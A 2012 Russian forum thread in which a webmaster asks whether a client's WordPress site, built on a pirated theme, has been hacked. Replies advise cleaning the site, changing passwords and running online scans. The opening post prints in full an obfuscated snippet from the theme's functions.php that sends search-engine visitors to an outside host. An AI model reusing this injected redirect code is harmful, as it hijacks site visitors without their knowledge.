Легкая паника или взломали?

Тема в разделе "Мегафлуд", создана пользователем Ergoline, 5 янв 2012.

  1. Ergoline

    Ergoline madao

    Регистр.:
    28 июл 2006
    Сообщения:
    1.255
    Симпатии:
    445
    Преамбула - позавчера знакомые попросили поставить сайтик на 5 страничек - так визитка.
    взял и поставил вп, темку взял, как всегда на варезе, каспер молчал.
    Ну думаю через пару дней займусь.
    сегодня утром обновил вп до 3.31
    и тут начали возникать легкие подозрения - глянул в исходный хтмл на главной и вижу

    Код:
    <!-- closing: content -->
        </div>
     
     
    <input type="hidden" name="6OSjqD8ELhFT" id="6OSjqD8ELhFT" />
    <script type="text/javascript">
    function fQ3neN27k65Eb() {
        var o=document.getElementById("6OSjqD8ELhFT");
        o.value="zxNcpEnYlNUj";
    }
    var bSH1X6cmSEiAT = document.getElementById("submit");
    if (bSH1X6cmSEiAT) {
        var chmj44320BWpI = document.getElementById("6OSjqD8ELhFT");
        var pFB3mPNdtD49u = bSH1X6cmSEiAT.parentNode;
        pFB3mPNdtD49u.appendChild(chmj44320BWpI, bSH1X6cmSEiAT);
        addHandler(bSH1X6cmSEiAT, "mousedown", fQ3neN27k65Eb);
        addHandler(bSH1X6cmSEiAT, "keypress", fQ3neN27k65Eb);
    }
    </script>
    <!--scounter--><!-- closing: main container -->
    </div>
     
    <!-- footer -->
    поиск по словам ничего не дал.
    единственно зацепка возможно в functions.php внизу там вот такое счастье

    Код:
    <?php
    add_action('get_footer', 'add_sscounter');
        function add_sscounter(){
            echo '<!--scounter-->';
            if(function_exists('is_user_logged_in')){
                if(time()%2 == 0 && !is_user_logged_in()){           
                    echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                }
            }
        }
    ?>  
    но к сожалению пхп не знаю пока что, могу и ошибиться. да, при смене тем код остается. по этому последний код может и не иметь ни какого значения

    Ну и сам вопрос просто паранойя, или пора где-то копать - в теме, в плагах и как расскопать? (тему менять не хотят - чем то приглянулась знакомой, и... все). Хотя подобных хватает(((
     
  2. budulay

    budulay

    Регистр.:
    8 апр 2006
    Сообщения:
    283
    Симпатии:
    87
    Похоже на вирус, тему менять не обязательно, просто почистить и плагины тоже обновить до последних версий.. ну и сменить пароли

    для уверенности еще можно проверить через сервисы типа:

    http://2ip.ru/site-virus-scaner/
    http://antivirus-alarm.ru/proverka
     
    Ergoline нравится это.
  3. dellun

    dellun Постоялец

    Регистр.:
    8 дек 2008
    Сообщения:
    101
    Симпатии:
    31
    Поставь локально на "денвер" и запусти сниффер - посмотришь куда стучится...
     
  4. Ergoline

    Ergoline madao

    Регистр.:
    28 июл 2006
    Сообщения:
    1.255
    Симпатии:
    445
    ну работы сделано там не так много, просто б допереть - это дело в только шабе, или что то с плагинов еще что-то? (просто буквально 3 недели назад на другой вп, на другом хосте шелл залили). Начинается легкая паранойя )
    он лайн проверка - вирутотал 0 все ок, а на других он лайн - там аваст и глам слегка ругаются
    сам клиент http://www.advokatessa.kiev.ua/ [​IMG] а это он-лайн проверка http://antivirus-alarm.ru/proverka/?url=http://www.advokatessa.kiev.ua/ [​IMG]
    само недоразумение на морде между футером и контентом
     
  5. rayahari

    rayahari Постоялец

    Регистр.:
    14 дек 2010
    Сообщения:
    83
    Симпатии:
    6
    Это вирус чувак - у меня подобная заморочка была с vbulletin в 2008.
     
  6. Ergoline

    Ergoline madao

    Регистр.:
    28 июл 2006
    Сообщения:
    1.255
    Симпатии:
    445
    да разобрался уже в ситуации.
    это плагин для вп антиспамный так себя ведет - который создает ложное поле для спамеров - невидимая капча.
    просто паника была по тому, что за пару недель до этого в другом месте залили шелл... (тогда была атака на многие вп - через рисунки)
    тему можно закрывать
     
  7. rayahari

    rayahari Постоялец

    Регистр.:
    14 дек 2010
    Сообщения:
    83
    Симпатии:
    6
    Ставьте антивирусники на хостинги - пусть даже бесплатные!